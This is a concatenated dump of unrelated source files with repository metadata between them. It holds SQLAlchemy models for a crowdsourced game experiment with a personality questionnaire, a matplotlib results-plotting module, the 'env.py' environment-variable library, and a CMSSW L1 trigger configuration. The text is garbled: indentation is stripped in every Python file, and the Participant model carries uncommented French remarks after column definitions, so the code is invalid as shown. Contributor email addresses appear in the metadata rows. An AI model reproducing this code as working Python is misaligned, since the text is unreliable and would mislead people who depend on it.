datastring = Column(Text, nullable=True)
email = Column(Text, nullable=True)
ipaddress = Column(String(128), nullable=True)
note = Column(Text, nullable=True)
codes = relationship("Code",backref="user",cascade="all,delete")
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %s, %r, %r, %s)" % (
self.assignmentId,
self.workerId,
self.cond,
self.status,
self.codeversion )
#Index('idx_worker_in_user', User.worker)
class Participant(Base):
"""
Object representation of a participant in the database.
"""
__tablename__ = TABLE_PARTICIPANT
# Status codes
ALLOCATED = 1
CONSENTED = 2
INSTRUCTED = 3
STARTED = 4
COMPLETED = 5
DEBRIEFED = 6
CREDITED = 7
QUITEARLY = 8
assignmentId =Column(String(128), primary_key=True)
workerId = Column(String(128), primary_key=True)
hitId = Column(String(128))
ipaddress = Column(String(128))
cond = Column(Integer)
counterbalance = Column(Integer)
codeversion = Column(String(128))
beginhit = Column(DateTime, nullable=True) heure dans waiting room
beginexp = Column(DateTime, nullable=True) heure debut gameset
endhit = Column(DateTime, nullable=True) heure fin gameset
status = Column(Integer, default = 1)
debriefed = Column(Boolean)
datastring = Column(Text, nullable=True)
userid = Column(Integer, ForeignKey(TABLE_USER+'.id',
use_alter=True, name='fk_participant_user_id',
onupdate="CASCADE", ondelete="CASCADE"))
# many to many Participant<->Game
games = relationship('Game',
secondary=game_participant_table,
backref="participants",cascade="all,delete")
gamesets = relationship('GameSet',
secondary=gameset_participant_table,
backref="participants",cascade="all,delete")
choices = relationship("Choice",backref="participant",cascade="all,delete")
def __init__(self, hitId, ipaddress, assignmentId, workerId, cond, counterbalance):
print "TABLE_PARTICIPANT"
self.hitId = hitId
self.ipaddress = ipaddress
self.assignmentId = assignmentId
self.workerId = workerId
self.cond = cond
self.counterbalance = counterbalance
self.status = 1
self.codeversion = CODE_VERSION
self.debriefed = False
self.beginhit = datetime.datetime.now()
def __repr__( self ):
return "Subject(%s, %s, %r, %r, %s)" % (
self.assignmentId,
self.workerId,
self.cond,
self.status,
self.codeversion )
#Index('idx_user_in_participant', Participant.userid),
# Added by Sam
class GameSet(Base):
"""
Object representation of a set of games in the database.
"""
__tablename__ = TABLE_GAMESET
UNUSED = 0
WAITING_FOR_PARTICIPANTS = 1
STARTED = 2
TERMINATED = 3
id = Column(Integer, primary_key=True)
status = Column(Integer, default = WAITING_FOR_PARTICIPANTS)
numExpectedParticipants = Column(Integer, default = 2)
numGames = Column(Integer, default = 10);
datastring = Column(Text, nullable=True)
# many to many Game<->Participant
#participants = relationship('Participant', secondary=Games_Participants, backref='games')
# one to many GameSet<->Game
games = relationship("Game",backref="gameset",cascade="all,delete")
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.numExpectedParticipants,
self.numGames,
self.datastring )
def curGameNum(self):
return(len(self.games))
# Added by coco
class Image(Base):
"""
Object representation of a decision in the database.
"""
__tablename__ = TABLE_IMAGE
FREE = 1
USED = 2
id = Column(Integer, primary_key=True)
pic_name = Column(String(128), nullable=True)
percent = Column(Integer, nullable=True)
complexity = Column(Integer, nullable=True)
color = Column(String(128),nullable=True)
status = Column(Integer, default=FREE)
gameid = Column(Integer, ForeignKey(TABLE_GAME+'.id',
use_alter=True, name='fk_image_game_id',
onupdate="CASCADE", ondelete="CASCADE"))
def __init__(self, pic_name, percent,color,complexity):
self.pic_name = pic_name
self.percent = percent
self.color = color
self.complexity = complexity
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.datastring )
Index('idx_game_in_image', Image.gameid),
class Game(Base):
"""
Object representation of a game in the database.
"""
__tablename__ = TABLE_GAME
UNUSED = 0
WAITING_FOR_PARTICIPANTS = 1
STARTED = 2
TERMINATED = 3
id = Column(Integer, primary_key=True)
num = Column(Integer, default = 1)
status = Column(Integer, default = WAITING_FOR_PARTICIPANTS)
numExpectedParticipants = Column(Integer, default = 0)
numRounds = Column(Integer, default = 3);
datastring = Column(Text, nullable=True)
gamesetid = Column(Integer, ForeignKey(TABLE_GAMESET+'.id',
use_alter=True, name='fk_game_gameset_id',
onupdate="CASCADE", ondelete="CASCADE"))
# Added by coco
image = relationship("Image",backref="game",cascade="all,delete")
# many to many Game<->Participant
#participants = relationship('Participant', secondary=Games_Participants, backref='games')
# one to many Game<->Round
rounds = relationship("Round",backref="game",cascade="all,delete")
def __init__(self):
# Added by coco: create 3 pictures
# WARNING : to be modified to fetch 3 FREE images from the database
matches = Image.query.filter(Image.status == Image.FREE).all()
for curimage in matches[0:3]:
curimage.status = Image.USED
self.image.append(curimage)
db_session.commit()
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.numExpectedParticipants,
self.numRounds,
self.datastring )
def curRoundNum(self):
return(len(self.rounds))
class Round(Base):
"""
Object representation of a round in the database.
"""
__tablename__ = TABLE_ROUND
# status
UNUSED = 0
STARTED = 1
TERMINATED = 2
# type
LONE = 0;
SOCIAL = 1;
id = Column(Integer, primary_key=True)
num = Column(Integer, default = 1)
status = Column(Integer, default = 1)
type = Column(Integer, default = LONE)
datastring = Column(Text, nullable=True)
startTime = Column(DateTime, nullable=True)
maxreward = Column(REAL, nullable=True)
gameid = Column(Integer, ForeignKey(TABLE_GAME+'.id',
use_alter=True, name='fk_round_game_id',
onupdate="CASCADE", ondelete="CASCADE"))
choices = relationship("Choice",backref="round",cascade="all,delete")
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.datastring )
def listOfChoices(self):
keytuple0 = db_session.query(Decision.value).filter(Decision.num == 0).join(Choice.decisions).filter(Choice.roundid == self.id).join(Round).filter(Round.id == self.id).all()
keytuple1 = db_session.query(Decision.value).filter(Decision.num == 1).join(Choice.decisions).filter(Choice.roundid == self.id).join(Round).filter(Round.id == self.id).all()
keytuple2 = db_session.query(Decision.value).filter(Decision.num == 2).join(Choice.decisions).filter(Choice.roundid == self.id).join(Round).filter(Round.id == self.id).all()
#print "Result from listOfChoices"
#print keytuple
res0 = [];
for item in keytuple0:
res0.append(item[0])
res1 = [];
for item in keytuple1:
res1.append(item[0])
res2 = [];
for item in keytuple2:
res2.append(item[0])
res = [];
res.append(res0);
res.append(res1);
res.append(res2);
#print res
return res
Index('idx_game_in_round', Round.gameid)
class Choice(Base):
"""
Object representation of a choice in the database.
"""
__tablename__ = TABLE_CHOICE
id = Column(Integer, primary_key=True)
status = Column(Integer, default = 1)
#decision = Column(REAL, nullable=True)
decisions = relationship("Decision",backref="choice",cascade="all,delete")
datastring = Column(Text, nullable=True)
roundid = Column(Integer, ForeignKey(TABLE_ROUND+'.id',
use_alter=True, name='fk_choice_round_id',
onupdate="CASCADE", ondelete="CASCADE"))
assignmentId =Column(String(128), nullable=False)
workerId = Column(String(128), nullable=False)
__table_args__ = (
ForeignKeyConstraint(['assignmentId','workerId'],
[TABLE_PARTICIPANT+'.assignmentId',
TABLE_PARTICIPANT+'.workerId'],name='fk_choice_part_id',
onupdate="CASCADE", ondelete="CASCADE"),
UniqueConstraint('id')
)
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.datastring )
def listOfDecisions(self):
key0 = db_session.query(Decision.value).filter(Decision.num == 0).join(Choice.decisions).filter(Choice.id == self.id).one()
key1 = db_session.query(Decision.value).filter(Decision.num == 1).join(Choice.decisions).filter(Choice.id == self.id).one()
key2 = db_session.query(Decision.value).filter(Decision.num == 2).join(Choice.decisions).filter(Choice.id == self.id).one()
print "Result from listOfDecisions"
#print keytuple
res = [];
res.append(key0.value);
res.append(key1.value);
res.append(key2.value);
print "res Decisions"
print res
return res
Index('idx_round_in_choice', Choice.roundid)
Index('idx_assignment_worker_in_choice', Choice.assignmentId, Choice.workerId)
class Decision(Base):
"""
Object representation of a decision in the database.
"""
__tablename__ = TABLE_DECISION
USER_MADE = 1;
AUTO = 2;
id = Column(Integer, primary_key=True)
status = Column(Integer, default = USER_MADE)
num = Column(Integer, nullable=True)
value = Column(REAL, nullable=True)
datastring = Column(Text, nullable=True)
reward = Column(REAL, nullable=True)
choiceid = Column(Integer, ForeignKey(TABLE_CHOICE+'.id',
use_alter=True, name='fk_decision_choice_id',
onupdate="CASCADE", ondelete="CASCADE"))
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.datastring )
Index('idx_choice_in_decision', Decision.choiceid)
class Code(Base):
"""
Object representation of a user code (CrowdFlower) in the database.
"""
__tablename__ = TABLE_CODE
FREE = 0;
USED = 1;
id = Column(Integer, primary_key=True)
status = Column(Integer, default = FREE)
num = Column(Integer, nullable=True)
value = Column(String(128), nullable=True)
userid = Column(Integer, ForeignKey(TABLE_USER+'.id',
use_alter=True, name='fk_code_user_id',
onupdate="CASCADE", ondelete="CASCADE"))
def __init__(self):
pass
def __repr__( self ):
return "Subject(%s, %r, %r, %s)" % (
self.id,
self.status,
self.datastring )
Index('idx_user_in_code', Code.userid)
class Questionnaire(Base):
"""
Object representation of a decision in the database.
"""
__tablename__ = TABLE_QUESTIONNAIRE
id = Column(Integer, primary_key=True)
status = Column(Integer, default = 1)
userid = Column(Integer, ForeignKey(TABLE_USER+'.id',
use_alter=True, name='fk_questionnaire_user_id',
onupdate="CASCADE", ondelete="CASCADE"))
#gamesetid = Column(Integer, ForeignKey(TABLE_GAMESET+'.id',
# use_alter=True, name='fk_questionnaire_gameset_id',
# onupdate="CASCADE", ondelete="CASCADE"))
gamesetid = Column(Integer, default = 0)
aloneAnswer = Column(Boolean, default=True)
#aloneQuestion = "Have you completed the game alone ?"
communicate = Column(Boolean, default=True)
#communicateQuestion = "Have you communicated with the other participant in any way druing the game ?"
communicateDescription = Column(Text, default="")
extraverted = Column(Integer, default=0)
critical = Column(Integer, default=0)
dependable = Column(Integer, default=0)
anxious = Column(Integer, default=0)
open = Column(Integer, default=0)
reserved = Column(Integer, default=0)
sympathetic = Column(Integer, default=0)
disorganized = Column(Integer, default=0)
calm = Column(Integer, default=0)
conventional = Column(Integer, default=0)
sexe = Column(Integer, default=0)
nativespeakenglish = Column(Integer, default=0)
schoolgrade = Column(Integer, default=0)
def __init__(self):
pass
def __repr__( self ):
return "Subject(%r, %r, %r, %r, %r, %r, %s, %r, %r, %r, %r, %r, %r, %r, %r, %r, %r, %r, %r)" % (
self.id,
self.status,
self.userid,
self.gamesetid,
self.aloneAnswer,
self.communicate,
self.communicateDescription,
self.extraverted,
self.critical,
self.dependable,
self.anxious,
self.open,
self.reserved,
self.sympathetic,
self.disorganized,
self.calm,
self.sexe,
self.nativespeakenglish,
self.schoolgrade
)
Index('idx_user_in_questionnaire', Questionnaire.userid)
#Index('idx_gameset_in_questionnaire', Questionnaire.gamesetid)
| [
"samuel.martinsa@gmail.com"
] | samuel.martinsa@gmail.com |
2475a91607980124875ab9ed113fb3f1a9d639cb | 5b3bc632a29c77d3388e9178fe583d6ae6993730 | /visuals.py | e30da2fab500bc81c37e9a879b84825ee8e28763 | [] | no_license | NagaHarish34/Liver-Disease | fb181d4fd4a125f5ce93129a2075face7df4052c | 2f66ca6289ba373d20319a114e3dd86f8ae5bb4b | refs/heads/master | 2020-04-26T18:19:28.110217 | 2019-03-04T12:35:36 | 2019-03-04T12:35:36 | 173,741,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,299 | py | ###########################################
# Suppress matplotlib user warnings
# Necessary for newer version of matplotlib
import warnings
warnings.filterwarnings("ignore", category = UserWarning, module = "matplotlib")
#
# Display inline matplotlib plots with IPython
from IPython import get_ipython
get_ipython().run_line_magic('matplotlib', 'inline')
###########################################
import matplotlib.pyplot as pl
import matplotlib.patches as mpatches
import numpy as np
import pandas as pd
from time import time
from sklearn.metrics import f1_score, accuracy_score
def distribution(data, transformed = False):
"""
Visualization code for displaying skewed distributions of features
"""
# Create figure
fig = pl.figure(figsize = (11,5));
# Skewed feature plotting
for i, feature in enumerate(['capital-gain','capital-loss']):
ax = fig.add_subplot(1, 2, i+1)
ax.hist(data[feature], bins = 25, color = '#00A0A0')
ax.set_title("'%s' Feature Distribution"%(feature), fontsize = 14)
ax.set_xlabel("Value")
ax.set_ylabel("Number of Records")
ax.set_ylim((0, 2000))
ax.set_yticks([0, 500, 1000, 1500, 2000])
ax.set_yticklabels([0, 500, 1000, 1500, ">2000"])
# Plot aesthetics
if transformed:
fig.suptitle("Log-transformed Distributions of Continuous Census Data Features", \
fontsize = 16, y = 1.03)
else:
fig.suptitle("Skewed Distributions of Continuous Census Data Features", \
fontsize = 16, y = 1.03)
fig.tight_layout()
fig.show()
def evaluate(results, accuracy, f1):
"""
Visualization code to display results of various learners.
inputs:
- learners: a list of supervised learners
- stats: a list of dictionaries of the statistic results from 'train_predict()'
- accuracy: The score for the naive predictor
- f1: The score for the naive predictor
"""
# Create figure
fig, ax = pl.subplots(2, 4, figsize = (11,7))
# Constants
bar_width = 0.3
colors = ['#A00000','#00A0A0','#00A000']
# Super loop to plot four panels of data
for k, learner in enumerate(results.keys()):
for j, metric in enumerate(['train_time', 'acc_train', 'f_train', 'pred_time', 'acc_test', 'f_test']):
for i in np.arange(3):
# Creative plot code
ax[j//3, j%3].bar(i+k*bar_width, results[learner][i][metric], width = bar_width, color = colors[k])
ax[j//3, j%3].set_xticks([0.45, 1.45, 2.45])
ax[j//3, j%3].set_xticklabels(["1%", "10%", "100%"])
ax[j//3, j%3].set_xlabel("Training Set Size")
ax[j//3, j%3].set_xlim((-0.1, 3.0))
# Add unique y-labels
ax[0, 0].set_ylabel("Time (in seconds)")
ax[0, 1].set_ylabel("Accuracy Score")
ax[0, 2].set_ylabel("F-score")
ax[1, 0].set_ylabel("Time (in seconds)")
ax[1, 1].set_ylabel("Accuracy Score")
ax[1, 2].set_ylabel("F-score")
# Add titles
ax[0, 0].set_title("Model Training")
ax[0, 1].set_title("Accuracy Score on Training Subset")
ax[0, 2].set_title("F-score on Training Subset")
ax[1, 0].set_title("Model Predicting")
ax[1, 1].set_title("Accuracy Score on Testing Set")
ax[1, 2].set_title("F-score on Testing Set")
# Add horizontal lines for naive predictors
ax[0, 1].axhline(y = accuracy, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')
ax[1, 1].axhline(y = accuracy, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')
ax[0, 2].axhline(y = f1, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')
ax[1, 2].axhline(y = f1, xmin = -0.1, xmax = 3.0, linewidth = 1, color = 'k', linestyle = 'dashed')
# Set y-limits for score panels
ax[0, 1].set_ylim((0, 1))
ax[0, 2].set_ylim((0, 1))
ax[1, 1].set_ylim((0, 1))
ax[1, 2].set_ylim((0, 1))
# Set additional plots invisibles
ax[0, 3].set_visible(False)
ax[1, 3].axis('off')
# Create legend
for i, learner in enumerate(results.keys()):
pl.bar(0, 0, color=colors[i], label=learner)
pl.legend()
# Aesthetics
pl.suptitle("Performance Metrics for Three Supervised Learning Models", fontsize = 16, y = 1.10)
pl.tight_layout()
pl.show()
def feature_plot(importances, X_train, y_train):
# Display the five most important features
indices = np.argsort(importances)[::-1]
columns = X_train.columns.values[indices[:5]]
values = importances[indices][:5]
# Creat the plot
fig = pl.figure(figsize = (9,5))
pl.title("Normalized Weights for First Five Most Predictive Features", fontsize = 16)
pl.bar(np.arange(5), values, width = 0.6, align="center", color = '#00A000', \
label = "Feature Weight")
pl.bar(np.arange(5) - 0.3, np.cumsum(values), width = 0.2, align = "center", color = '#00A0A0', \
label = "Cumulative Feature Weight")
pl.xticks(np.arange(5), columns)
pl.xlim((-0.5, 4.5))
pl.ylabel("Weight", fontsize = 12)
pl.xlabel("Feature", fontsize = 12)
pl.legend(loc = 'upper center')
pl.tight_layout()
pl.show()
| [
"noreply@github.com"
] | noreply@github.com |
a7334361535cd4503b271c35bfd8534292921615 | 96d6c5c14f3917726d5695deddb368762d83a0f7 | /virtualenv/lib/python3.9/site-packages/env.py | 13f609ffd0e4643aaf06e93d406632fe1a97900d | [] | no_license | CyberFlameGO/PythonUtils | d4e9fdbe8c688d3507615a6ac52bdb6ebc2303df | dd04bd02d303fc369c8d4407ba1bcb6e4fa720ea | refs/heads/master | 2023-06-30T05:36:31.094658 | 2021-08-02T21:30:09 | 2021-08-02T21:30:09 | 383,275,512 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,223 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
env.py
Simplified access to environment variables in Python.
@copyright: 2018 by Mike Miller
@license: LGPL
'''
#
# The implementation below is odd at times due to using the module as a
# container.
#
import sys, os
try:
from collections.abc import MutableMapping
except ImportError:
from collections import MutableMapping # Py2
__version__ = '0.92'
class EnvironmentVariable(str):
''' Represents a variable entry in the environment. Base class.
Contains the functionality of strings plus a number of convenience
properties for type conversion.
'''
def __init__(self, *args):
raise NotImplementedError('Use Entry() or NullEntry() instead.')
class Entry(EnvironmentVariable):
''' Represents an existing entry in the environment. '''
def __new__(cls, name, value):
return str.__new__(cls, value) # Py2/3
def __init__(self, name, value, sep=os.pathsep):
self.name = name
self.value = value
self._pathsep = sep
@property
def truthy(self):
''' Convert a Boolean-like string value to a Boolean or None.
Note: the rules are different than string type "truthiness."
'0' --> False
'1' --> True
('n', 'no', 'false') --> False # case-insensitive
('y', 'yes', 'true') --> True # case-insensitive
else --> raise ValueError()
'''
lower = self.lower()
result = None
if lower.isdigit():
result = bool(int(lower))
elif lower in ('y', 'yes', 'true'):
result = True
elif lower in ('n', 'no', 'false'):
result = False
elif self:
raise ValueError(f'{self!r} is not a valid value for truthy().')
return result
@property
def bool(self):
''' Return a bool. '''
return bool(self)
@property
def float(self):
''' Return a float. '''
return float(self)
@property
def int(self):
''' Return an int. '''
return int(self)
@property
def list(self):
''' Split a path string (defaults to os.pathsep) and return list.
Use str.split instead when a custom delimiter is needed.
'''
return self.split(self._pathsep)
@property
def path(self):
''' Return a path string as a Path object. '''
from pathlib import Path
return Path(self)
@property
def path_list(self):
''' Return list of Path objects. '''
from pathlib import Path
return [ Path(pathstr) for pathstr in self.split(self._pathsep) ]
@property
def from_json(self):
''' Parse a JSON string. '''
from json import loads
return loads(self)
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.name, self.value)
class NullEntry(EnvironmentVariable):
''' Represents an non-existent entry in the environment.
This is a None-like convenience object that won't throw AttributeError
on attribute lookups. Attributes are instead returned as "falsey"
numeric zero or empty string/containers.
'''
def __new__(cls, name):
return str.__new__(cls, '') # Py2/3
def __init__(self, name):
self.name = name
self.value = None
def __bool__(self):
return False
@property
def truthy(self):
return None if (self.value is None) else False
@property
def bool(self):
return False
@property
def float(self):
return 0.0
@property
def int(self):
return 0
@property
def list(self):
return []
@property
def path(self):
return None
@property
def path_list(self):
return []
@property
def from_json(self):
return {}
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.name)
class Environment(MutableMapping):
''' A mapping object that presents a simplified view of the OS Environment.
'''
_Entry_class = Entry # save for Python2 compatibility :-/
_NullEntry_class = NullEntry
def __init__(self, environ=os.environ,
sensitive=False if os.name == 'nt' else True,
writable=False,
):
# setobj - prevents infinite recursion due to custom setattr
# https://stackoverflow.com/a/16237698/450917
setobj = object.__setattr__
setobj(self, '_original_env', environ),
setobj(self, '_sensitive', sensitive),
setobj(self, '_writable', writable),
if sensitive:
setobj(self, '_envars', environ)
else:
setobj(self, '_envars', { name.lower(): value
for name, value in environ.items() })
def __contains__(self, name):
return name in self._envars
def __getattr__(self, name):
''' Customize attribute access, allow direct access to variables. '''
# need a loophole for configuring a new instance
if name == 'Environment':
return Environment
elif name == 'Entry':
return Entry or self._Entry_class # Py2 compat
if not self._sensitive:
name = name.lower()
try:
return self._Entry_class(name, self._envars[name])
except KeyError:
return self._NullEntry_class(name)
def __setattr__(self, name, value):
if self._writable:
self._envars[name] = value
if self._original_env is os.environ: # push to environment
os.environ[name] = value
else:
raise AttributeError('This Environment is read-only.')
def __delattr__(self, name):
del self._envars[name]
# MutableMapping needs these implemented, defers to internal dict
def __len__(self):
return len(self._envars)
def __delitem__(self, key):
del self._envars[key]
def __getitem__(self, key):
return self._envars[key]
def __setitem__(self, key, item):
self.data[key] = item
def __iter__(self):
return iter(self._envars)
def __repr__(self):
entry_list = ', '.join([ ('%s=%r' % (k, v)) for k, v in self.items() ])
return '%s(%s)' % (self.__class__.__name__, entry_list)
def from_prefix(self, prefix, lowercase=True, strip=True):
''' Returns a dictionary of keys with the same prefix.
Compat with kr/env, lowercased.
> xdg = env.from_prefix('XDG_')
> for key, value in xdg.items():
print('%-20s' % key, value[:6], '…')
config_dirs /etc/x…
current_desktop MATE
data_dirs /usr/s…
…
'''
env_subset = {}
for key in self._envars.keys():
if key.startswith(prefix):
if strip: # cut prefix
new_key = key[len(prefix):]
new_key = new_key.lower() if lowercase else new_key
env_subset[new_key] = self._envars[key]
return Environment(
environ=env_subset,
sensitive=self._sensitive,
writable=self._writable,
)
prefix = from_prefix
def map(self, **kwargs):
''' Change a name on the fly. Compat with kr/env. '''
return { key: self._envars[kwargs[key]] # str strips Entry
for key in kwargs }
if __name__ == '__main__':
# keep tests close
testenv = dict(
EMPTY='',
JSON_DATA='{"one":1, "two":2, "three":3}',
PI='3.1416',
READY='no',
PORT='5150',
QT_ACCESSIBILITY='1',
SSH_AUTH_SOCK='/run/user/1000/keyring/ssh',
TERM='xterm-256color',
USER='fred',
XDG_DATA_DIRS='/usr/local/share:/usr/share',
XDG_SESSION_ID='c1',
XDG_SESSION_TYPE='x11',
)
__doc__ += '''
Default::
>>> env = Environment(testenv, sensitive=True, writable=True)
>>> env.USER # exists, repr
Entry('USER', 'fred')
>>> str(env.USER) # exists, str
'fred'
>>> env.USER + '_suffix' # str ops
'fred_suffix'
>>> env.USER.title() # str ops II
'Fred'
>>> bool(env.USER) # check exists/not empty
True
>>> print(f'term: {env.TERM}') # via interpolation
term: xterm-256color
>>> 'NO_EXISTO' in env # check existence, DNE
False
>>> env.NO_EXISTO or 'default' # DNE with default
'default'
>>> env.NO_EXISTO # var DNE repr
NullEntry('NO_EXISTO')
>>> env.NO_EXISTO.value is None # check existence II
True
>>> bool(env.NO_EXISTO) # check when DNE: False
False
>>> 'EMPTY' in env # check existence
True
>>> env.EMPTY # exists but empty
Entry('EMPTY', '')
>>> env.EMPTY.value is None # check existence II
False
>>> bool(env.EMPTY) # check when empty: False
False
>>> env.EMPTY or 'default' # exists, blank w/ def.
'default'
>>> key_name = 'PI'
>>> env[key_name] # getitem syntax
'3.1416'
>>> env.PI.float # type conversion
3.1416
>>> env.PORT.int or 9000 # type conv. w/ default
5150
>>> env.QT_ACCESSIBILITY.truthy # 0/1/yes/no/true/false
True
>>> sorted(env.JSON_DATA.from_json.keys()) # sorted: compat < 3.6
['one', 'three', 'two']
>>> env.XDG_DATA_DIRS.list
['/usr/local/share', '/usr/share']
>>> env.XDG_DATA_DIRZ.list # DNE fallback
[]
# using isinstance to avoid Platform errs:
>>> from pathlib import Path
>>> isinstance(env.SSH_AUTH_SOCK.path, Path)
True
>>> all(map(lambda p: isinstance(p, Path), env.XDG_DATA_DIRS.path_list))
True
KR/env compatibility::
>>> sorted(env.prefix('XDG_', False).keys())
['DATA_DIRS', 'SESSION_ID', 'SESSION_TYPE']
>>> sorted(env.prefix('XDG_', False).values())
['/usr/local/share:/usr/share', 'c1', 'x11']
>>> env.map(username='USER')
{'username': 'fred'}
Writing is possible when writable is set to True (see above),
though not exceedingly useful::
>>> env.READY
Entry('READY', 'no')
>>> env.READY = 'yes'
>>> env.READY
Entry('READY', 'yes')
Unicode test::
>>> env.MÖTLEY = 'Crüe'
>>> env.MÖTLEY
Entry('MÖTLEY', 'Crüe')
Sensitive False::
>>> env = Environment(testenv, sensitive=False)
>>> str(env.USER) # interactive repr
'fred'
>>> str(env.user) # interactive repr
'fred'
'''
import doctest
# testmod returns (failure_count, test_count):
sys.exit(
doctest.testmod(verbose=(True if '-v' in sys.argv else False))[0]
)
else:
# save original module for later, just in case it's needed.
Environment._module = sys.modules[__name__]
# Wrap module with instance for direct access
sys.modules[__name__] = Environment()
| [
"cyberflameu@gmail.com"
] | cyberflameu@gmail.com |
f837ebf1b3fa78de1bf4edf422f8a338625f4bb3 | d9b8fce973a6c4f1d20e0fb09840a3d54473e8b4 | /end/project/bookdemo/booktest/tests.py | 3b33c04714da1fc19d5512db71ee5544038e719a | [] | no_license | pm0303/pmgit | 157c4c46f733327e3d87b4f13b7ee865ee0637d8 | 92de118cbabbba6c6c03b5e1494c9c46e439f13c | refs/heads/master | 2021-01-02T02:02:14.511468 | 2020-02-26T09:45:23 | 2020-02-26T09:45:23 | 239,445,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | from django.test import TestCase
# Create your tests here.
# 单元测试模块 暂时不需要关注 | [
"2641938505@qq.com"
] | 2641938505@qq.com |
d7f6722540037a29c7c6722f0fca5d042b7c0552 | 45d6b7739ef7e61779d778b16e2d2cb9b92a08c0 | /test/run_in_parallel-200PU-grow/SUB-Analyzer-44.py | 153296b77ea28b2b6bcea87c4d79a9a5af001630 | [] | no_license | isobelojalvo/phase2L1TauAnalyzer | 40b545baec97bf287a8d8ab26bea70546bf9f6f8 | 98ef6d31a523698ba0de48763cadee1d5b2ce695 | refs/heads/master | 2021-01-22T08:38:17.965156 | 2019-07-25T17:25:51 | 2019-07-25T17:25:51 | 92,623,686 | 0 | 1 | null | 2019-07-23T19:43:55 | 2017-05-27T20:56:25 | Python | UTF-8 | Python | false | false | 6,667 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: step2 --python_filename=rerun_step2_L1_onMCL1_FEVTHLTDEBUG.py --no_exec -s L1 --datatier GEN-SIM-DIGI-RAW -n 1 --era Phase2_timing --eventcontent FEVTDEBUGHLT --filein file:/afs/cern.ch/user/r/rekovic/release/CMSSW_9_3_2/src/step2_DIGI_PU200_10ev.root --conditions 93X_upgrade2023_realistic_v2 --beamspot HLLHC14TeV --geometry Extended2023D17 --fileout file:step2_ZEE_PU200_1ev_rerun-L1-L1Ntuple.root --customise=L1Trigger/L1TNtuples/customiseL1Ntuple.L1NtupleEMU
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('L1',eras.Phase2_trigger)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.Geometry.GeometryExtended2023D17Reco_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('Configuration.StandardSequences.SimL1Emulator_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('L1Trigger.TrackFindingTracklet.L1TrackletTracks_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(4000)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
"root://cmsxrootd.fnal.gov///store/relval/CMSSW_9_3_7/RelValZTT_14TeV/MINIAODSIM/PU25ns_93X_upgrade2023_realistic_v5_2023D17PU200-v1/10000/6CE39BE9-EA2D-E811-8FDA-0242AC130002.root"
),
inputCommands = cms.untracked.vstring("keep *",
"drop l1tHGCalTowerMapBXVector_hgcalTriggerPrimitiveDigiProducer_towerMap_HLT",
"drop l1tEMTFHit2016Extras_simEmtfDigis_CSC_HLT",
"drop l1tEMTFHit2016Extras_simEmtfDigis_RPC_HLT",
"drop l1tEMTFHit2016s_simEmtfDigis__HLT",
"drop l1tEMTFTrack2016Extras_simEmtfDigis__HLT",
"drop l1tEMTFTrack2016s_simEmtfDigis__HLT")
#skipEvents = cms.untracked.uint32(80)
)
process.source.secondaryFileNames = cms.untracked.vstring(
"/store/relval/CMSSW_9_3_7/RelValZTT_14TeV/GEN-SIM-DIGI-RAW/PU25ns_93X_upgrade2023_realistic_v5_2023D17PU200-v1/10000/FC056F35-2E2D-E811-BE3A-0242AC130002.root")
process.source.lumisToProcess = cms.untracked.VLuminosityBlockRange("1:46")
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('step2 nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.FEVTDEBUGHLToutput = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('GEN-SIM-DIGI-RAW'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:test_reprocess.root'),
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '100X_upgrade2023_realistic_v1', '')
process.load('SimCalorimetry.HcalTrigPrimProducers.hcaltpdigi_cff')
process.load('CalibCalorimetry.CaloTPG.CaloTPGTranscoder_cfi')
process.load('L1Trigger.L1THGCal.hgcalTriggerPrimitives_cff')
process.hgcl1tpg_step = cms.Path(process.hgcalTriggerPrimitives)
process.load('SimCalorimetry.EcalEBTrigPrimProducers.ecalEBTriggerPrimitiveDigis_cff')
process.EcalEBtp_step = cms.Path(process.simEcalEBTriggerPrimitiveDigis)
process.L1TrackTrigger_step = cms.Path(process.L1TrackletTracksWithAssociators)
